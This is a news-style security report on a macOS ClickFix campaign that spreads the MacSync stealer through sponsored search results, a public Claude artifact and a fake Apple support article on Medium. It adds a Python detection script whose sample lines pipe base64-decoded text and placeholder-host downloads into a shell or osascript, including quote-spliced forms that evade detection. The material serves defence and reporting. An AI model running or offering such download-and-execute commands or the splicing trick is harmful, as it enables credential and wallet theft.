A recent malware campaign has been exploiting macOS users by infiltrating Google-sponsored search results and leveraging legitimate platforms, such as Anthropic’s Claude AI and Medium. This sophisticated attack has already targeted over 15,000 users through two distinct methods, capitalizing on the users’ trust in well-known online services.
Methods of Attack
The initial attack strategy uses Google Ads to promote a malicious Claude AI artifact, masquerading as a legitimate macOS security guide. This occurs when users search for “Online dns resolver,” leading them to a sponsored link that redirects to a public Claude artifact titled “macOS Secure Command Execution.” This deceptive guide instructs users to paste a base64-encoded command into their Terminal application, which decodes and runs a harmful script designed to download the MacSync information stealer malware.
After execution, the malware connects to its command-and-control server at a2abotnet[.]com/dynamic using predefined authentication credentials. To avoid detection, it disguises its network traffic as normal web browsing by mimicking legitimate macOS browser User-Agent strings. The payload then retrieves an AppleScript component responsible for extracting sensitive data such as keychain information, browser data, and cryptocurrency wallet details.
Data Exfiltration Techniques
According to cybersecurity experts at Moonlock Lab, the stolen data is compressed and saved in /tmp/osalogging.zip before being sent to a2abotnet[.]com/gate through HTTP POST requests. The malware incorporates advanced retry strategies for managing large data transfers, including chunked uploads with up to eight retries and exponential backoff. Upon successful data transfer, it deletes the staging files to avoid leaving traces.
The second variant of the attack targets users searching for “macos cli disk space analyzer” through a Medium article hosted at apple-mac-disk-space.medium[.]com. This article pretends to be from Apple’s official Support Team and uses the same ClickFix social engineering technique, albeit with double-layered encoding and a different hosting setup. The malicious command cleverly uses string concatenation (cur""l instead of curl) to evade pattern-based detection systems.
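As an added example (not from the article or from Moonlock Lab's research), the following Python script shows how a detection rule can undo the quote-splicing trick described above before matching, so that a command like cur""l is evaluated as curl, and then flags the base64-decode-to-shell and download-to-shell pipelines both variants rely on. The log lines and the placeholder host are constructed for illustration.

```python
"""Heuristic detection of ClickFix-style terminal commands in process-execution logs."""
import re

# Constructed sample command lines, as an EDR might record from a Terminal session.
# Illustrative only: the base64 decodes to the word PLACEHOLDER and the host is a placeholder.
SAMPLE_COMMANDS = [
    'echo "UExBQ0VIT0xERVI=" | base64 -d | bash',                # base64 ClickFix pattern
    'cur""l -fsSL https://placeholder.invalid/s.sh | sh',        # quote splice, as in the article
    "c'u'rl -s https://placeholder.invalid/a.scpt | os''ascript",
    'du -sh /Library/* | sort -h',                                # benign disk-space check
    'ls -la /tmp',
]

# Quote pairs wrapping nothing or a short alphanumeric fragment, e.g. cur""l or c'u'rl.
_SPLICED = re.compile(r'''(["'])([A-Za-z0-9]{0,3})\1''')
# A backslash before an alphanumeric character, e.g. cu\rl, which the shell simply drops.
_ESCAPED = re.compile(r'\\([A-Za-z0-9])')


def normalize(cmd: str) -> str:
    """Undo simple token-splitting tricks so the rules see the command the shell will run."""
    cmd = _SPLICED.sub(r'\2', cmd)
    return _ESCAPED.sub(r'\1', cmd)


# Each rule is matched against the normalized command line.
RULES = {
    'base64_decode_to_shell': re.compile(
        r'base64\s+(-d|-D|--decode)\b.*\|\s*(sh|bash|zsh|osascript|python3?)\b'),
    'downloader_piped_to_shell': re.compile(
        r'\b(curl|wget)\b.*\|\s*(sh|bash|zsh|osascript)\b'),
}


def classify(cmd: str) -> list[str]:
    """Return the names of the heuristics a single command line trips."""
    effective = normalize(cmd)
    hits = [name for name, rx in RULES.items() if rx.search(effective)]
    # Record the evasion itself: the command only matched after the splicing was removed.
    if hits and effective != cmd:
        hits.append('quote_splice_obfuscation')
    return hits


def scan(commands: list[str]) -> dict[str, list[str]]:
    """Map each suspicious command line to the rules it matched; benign lines are omitted."""
    return {c: h for c in commands if (h := classify(c))}


if __name__ == '__main__':
    for cmd, hits in scan(SAMPLE_COMMANDS).items():
        print(f'{", ".join(hits):50s} {cmd}')
```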
Growing Threats and Precautionary Measures
These attack variants underscore the rising trend of cybercriminals abusing legitimate platforms and trusted services to spread malware. The use of Google Ads in malware distribution emphasizes the crucial need for verifying the authenticity of sources, even when they appear in sponsored search results. macOS users are strongly advised to refrain from executing terminal commands from unfamiliar sources and to verify the authenticity of support articles claiming to be from Apple or other reputable vendors.
Organizations should deploy endpoint detection solutions capable of monitoring suspicious terminal activity and network connections to unverified command-and-control servers. Staying informed about cybersecurity threats is essential for protection, and users are encouraged to follow updates on reliable platforms.
